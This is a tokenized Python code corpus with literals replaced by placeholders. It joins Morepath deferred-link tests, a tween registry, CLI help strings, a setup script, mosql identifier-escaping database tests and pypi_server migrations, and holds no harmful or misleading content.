path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> def test_defer_view_missing_view ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return { '<STR_LIT>' : request . view ( SubModel ( ) , name = '<STR_LIT>' ) } <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel , name = '<STR_LIT>' ) <EOL> def submodel_edit ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . 
mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT>' : None } <EOL> def test_defer_links_mount_parameters ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ sub . path ( path = '<STR_LIT>' , model = SubModel ) <EOL> def get_sub_model ( request ) : <EOL> return SubModel ( request . app . name ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' , <EOL> variables = lambda a : { '<STR_LIT>' : a . name } ) <EOL> def mount_sub ( mount_name ) : <EOL> return sub ( name = mount_name ) <EOL> @ root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( sub ( name = obj . name ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_link_acquisition ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . 
view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . link ( Model ( '<STR_LIT:foo>' ) ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( obj , app ) : <EOL> return app . child ( sub ( ) ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_view_acquisition ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . json ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . json ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . view ( Model ( '<STR_LIT:foo>' ) ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( obj , app ) : <EOL> return app . child ( sub ( ) ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { "<STR_LIT>" : "<STR_LIT>" } <EOL> def test_defer_link_acquisition_blocking ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . 
view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> try : <EOL> return request . link ( Model ( '<STR_LIT:foo>' ) ) <EOL> except LinkError : <EOL> return "<STR_LIT>" <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_view_acquisition_blocking ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . json ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . json ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . view ( Model ( '<STR_LIT:foo>' ) ) is None <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json is True <EOL> def test_defer_link_should_not_cause_web_views_to_exist ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> pass <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ root . view ( model = Model , name = '<STR_LIT>' ) <EOL> def model_extra ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( Model ) : <EOL> pass <EOL> @ sub . view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . link ( Model ( ) ) <EOL> @ root . 
mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> c . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> def test_defer_link_to_parent_from_root ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> pass <EOL> class OtherModel ( object ) : <EOL> pass <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return request . link ( OtherModel ( ) ) <EOL> @ root . defer_links ( model = OtherModel ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT:/>' ) <EOL> def test_special_link_overrides_deferred_link ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> class SpecialAlphaModel ( AlphaModel ) : <EOL> pass <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . path ( model = SpecialAlphaModel , path = '<STR_LIT>' ) <EOL> def get_root_alpha ( ) : <EOL> return SpecialAlphaModel ( ) <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ root . view ( model = RootModel , name = '<STR_LIT>' ) <EOL> def root_model_special ( self , request ) : <EOL> return request . link ( SpecialAlphaModel ( ) ) <EOL> @ alpha . 
path ( path = '<STR_LIT>' , model = AlphaModel ) <EOL> def get_alpha ( ) : <EOL> return AlphaModel ( ) <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_deferred_deferred_link ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ alpha . path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . view ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_deferred_deferred_view ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . 
App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ alpha . path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ alpha . json ( model = AlphaModel ) <EOL> def alpha_model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . json ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_deferred_view_has_app_of_defer ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . mount ( app = beta , path = '<STR_LIT>' ) <EOL> def mount_beta ( ) : <EOL> return beta ( ) <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ alpha . 
path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ alpha . json ( model = AlphaModel ) <EOL> def alpha_model_default ( self , request ) : <EOL> if request . app . __class__ == alpha : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . json ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . view ( AlphaModel ( ) ) <EOL> @ beta . defer_links ( model = AlphaModel ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent . child ( '<STR_LIT>' ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == '<STR_LIT>' <EOL> def test_deferred_loop ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> class Model ( object ) : <EOL> pass <EOL> @ root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( Model ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ alpha . defer_links ( model = Model ) <EOL> def defer_links_parent ( app , obj ) : <EOL> return app . parent <EOL> @ root . defer_links ( model = Model ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT:/>' ) <EOL> def test_defer_link_scenario ( ) : <EOL> class App ( morepath . App ) : <EOL> pass <EOL> class Child ( morepath . App ) : <EOL> pass <EOL> class Document ( object ) : <EOL> pass <EOL> @ App . mount ( app = Child , path = '<STR_LIT>' ) <EOL> def mount_child ( ) : <EOL> return Child ( ) <EOL> @ App . 
defer_links ( model = Document ) <EOL> def defer_document ( app , doc ) : <EOL> return app . child ( Child ( ) ) <EOL> @ App . path ( path = '<STR_LIT>' ) <EOL> class Root ( object ) : <EOL> pass <EOL> @ App . json ( model = Root ) <EOL> def root_view ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : request . link ( Document ( ) ) , <EOL> '<STR_LIT>' : request . view ( Document ( ) ) <EOL> } <EOL> @ App . json ( model = Document ) <EOL> def app_document_default ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> @ Child . path ( '<STR_LIT>' , model = Document ) <EOL> def get_document ( ) : <EOL> return Document ( ) <EOL> @ Child . json ( model = Document ) <EOL> def document_default ( self , request ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> c = Client ( App ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { '<STR_LIT>' : '<STR_LIT>' } <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> def test_defer_class_links_without_variables ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . class_link ( SubModel ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , variables = lambda obj : { } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . 
body == b'<STR_LIT>' <EOL> def test_defer_class_links_with_variables ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . class_link ( SubModel , variables = dict ( name = '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_link_uses_defer_class_links ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . 
body == b'<STR_LIT>' <EOL> def test_defer_links_and_defer_links_conflict ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . chidl ( Sub ( ) ) <EOL> @ Root . defer_class_links ( model = SubModel , <EOL> variables = lambda obj : { '<STR_LIT:name>' : obj . name } ) <EOL> def defer_class_links_sub_model ( app , model , variables ) : <EOL> return app . child ( Sub ( ) ) <EOL> with pytest . raises ( ConflictError ) : <EOL> Root . commit ( ) </s>
<s> """<STR_LIT>""" <EOL> from . toposort import toposorted , Info <EOL> from . publish import publish <EOL> class TweenRegistry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _tween_infos = [ ] <EOL> def register_tween_factory ( self , tween_factory , over , under ) : <EOL> """<STR_LIT>""" <EOL> self . _tween_infos . append ( Info ( tween_factory , over , under ) ) <EOL> def sorted_tween_factories ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ info . key for info in toposorted ( self . _tween_infos ) ] <EOL> def wrap ( self , app ) : <EOL> """<STR_LIT>""" <EOL> result = publish <EOL> for tween_factory in reversed ( self . sorted_tween_factories ( ) ) : <EOL> result = tween_factory ( app , result ) <EOL> return result </s>
<s> data_help = '''<STR_LIT>''' <EOL> data_binary_help = '''<STR_LIT>''' <EOL> data_urlencode_help = '''<STR_LIT>''' <EOL> digest_help = '''<STR_LIT>''' <EOL> referer_help = '''<STR_LIT>''' <EOL> form_help = '''<STR_LIT>''' <EOL> get_help = '''<STR_LIT>''' <EOL> header_help = '''<STR_LIT>''' <EOL> head_help = '''<STR_LIT>''' <EOL> insecure_help = '''<STR_LIT>''' <EOL> output_help = '''<STR_LIT>''' <EOL> remote_name_help = '''<STR_LIT>''' <EOL> range_help = '''<STR_LIT>''' <EOL> user_help = '''<STR_LIT>''' <EOL> url_help = '''<STR_LIT>''' <EOL> request_help = '''<STR_LIT>''' <EOL> user_agent_help = '''<STR_LIT>''' </s>
<s> from setuptools import setup , find_packages <EOL> import clime <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = clime . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> ) </s>
<s> from getpass import getuser <EOL> from random import randrange <EOL> from itertools import product <EOL> import mosql . util <EOL> import mosql . mysql <EOL> import mosql . std <EOL> def connect_to_postgresql ( ) : <EOL> import psycopg2 <EOL> conn = psycopg2 . connect ( user = getuser ( ) ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> server_encoding , = cur . fetchone ( ) <EOL> assert server_encoding == '<STR_LIT>' <EOL> cur . execute ( '<STR_LIT>' ) <EOL> client_encoding , = cur . fetchone ( ) <EOL> assert client_encoding == '<STR_LIT>' <EOL> cur . close ( ) <EOL> return conn <EOL> def make_identifier ( s ) : <EOL> if isinstance ( s , unicode ) : <EOL> s = s . encode ( '<STR_LIT:utf-8>' ) <EOL> return mosql . util . delimit_identifier ( <EOL> mosql . util . escape_identifier ( s ) <EOL> ) <EOL> DENO = <NUM_LIT:100> <EOL> POSTGRESQL_SLICE_SIZE = <NUM_LIT> <EOL> def gen_slice_for_postgresql ( s ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( s ) , POSTGRESQL_SLICE_SIZE ) : <EOL> yield s [ i : i + POSTGRESQL_SLICE_SIZE ] <EOL> def test_identifier_in_postgresql ( ) : <EOL> mosql . std . patch ( ) <EOL> conn = connect_to_postgresql ( ) <EOL> cur = conn . cursor ( ) <EOL> expected_text = u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected_text += u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> for sliced_expected_text in gen_slice_for_postgresql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> fetched_bytes , = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> conn . 
rollback ( ) <EOL> ascii_chars = [ unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ] <EOL> expected_text = u'<STR_LIT>' . join ( a + b for a , b in product ( ascii_chars , ascii_chars ) ) <EOL> for sliced_expected_text in gen_slice_for_postgresql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> fetched_bytes , = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> conn . rollback ( ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> def connect_to_mysql ( ) : <EOL> import MySQLdb <EOL> conn = MySQLdb . connect ( user = '<STR_LIT:root>' , db = '<STR_LIT:root>' ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( '''<STR_LIT>''' ) <EOL> _ , character_set_connection = cur . fetchone ( ) <EOL> assert character_set_connection == '<STR_LIT:utf8>' <EOL> cur . close ( ) <EOL> return conn <EOL> MYSQL_SLICE_SIZE = <NUM_LIT:64> <EOL> def gen_slice_for_mysql ( s ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( s ) , MYSQL_SLICE_SIZE ) : <EOL> yield s [ i : i + MYSQL_SLICE_SIZE ] <EOL> MYSQL_SPACE_CHAR_SET = set ( u'<STR_LIT>' ) <EOL> def fix_mysql_space_char ( s ) : <EOL> to_check_pos = - <NUM_LIT:1> <EOL> while s [ to_check_pos ] in MYSQL_SPACE_CHAR_SET : <EOL> to_check_pos -= <NUM_LIT:1> <EOL> if to_check_pos == - <NUM_LIT:1> : <EOL> return s <EOL> pos = to_check_pos + <NUM_LIT:1> <EOL> return s [ pos : ] + s [ : pos ] <EOL> def test_identifier_in_mysql ( ) : <EOL> mosql . mysql . patch ( ) <EOL> conn = connect_to_mysql ( ) <EOL> cur = conn . cursor ( ) <EOL> expected_text = u'<STR_LIT>' . join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected_text += u'<STR_LIT>' . 
join ( unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> for sliced_expected_text in gen_slice_for_mysql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> sliced_expected_text = fix_mysql_space_char ( sliced_expected_text ) <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> fetched_bytes , _ , _ , _ , _ , _ = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> cur . execute ( '<STR_LIT>' ) <EOL> ascii_chars = [ unichr ( i ) for i in xrange ( <NUM_LIT> , <NUM_LIT> + <NUM_LIT:1> ) ] <EOL> expected_text = u'<STR_LIT>' . join ( a + b for a , b in product ( ascii_chars , ascii_chars ) ) <EOL> for sliced_expected_text in gen_slice_for_mysql ( expected_text ) : <EOL> if randrange ( DENO ) != <NUM_LIT:0> : continue <EOL> sliced_expected_text = fix_mysql_space_char ( sliced_expected_text ) <EOL> cur . execute ( '''<STR_LIT>''' . format ( make_identifier ( sliced_expected_text ) ) ) <EOL> cur . execute ( '<STR_LIT>' ) <EOL> fetched_bytes , _ , _ , _ , _ , _ = cur . fetchone ( ) <EOL> fetched_text = fetched_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> assert fetched_text == sliced_expected_text <EOL> cur . execute ( '<STR_LIT>' ) <EOL> cur . close ( ) <EOL> conn . close ( ) </s>
<s> from pypi_server . db . migrator import migration <EOL> from pypi_server . db . packages import Package , PackageFile , PackageVersion <EOL> @ migration ( <NUM_LIT:3> ) <EOL> def create_package ( migrator , db ) : <EOL> db . create_tables ( [ Package ] ) <EOL> @ migration ( <NUM_LIT:4> ) <EOL> def create_package_version ( migrator , db ) : <EOL> db . create_tables ( [ PackageVersion ] ) <EOL> @ migration ( <NUM_LIT:5> ) <EOL> def create_package_file ( migrator , db ) : <EOL> db . create_tables ( [ PackageFile ] ) </s>
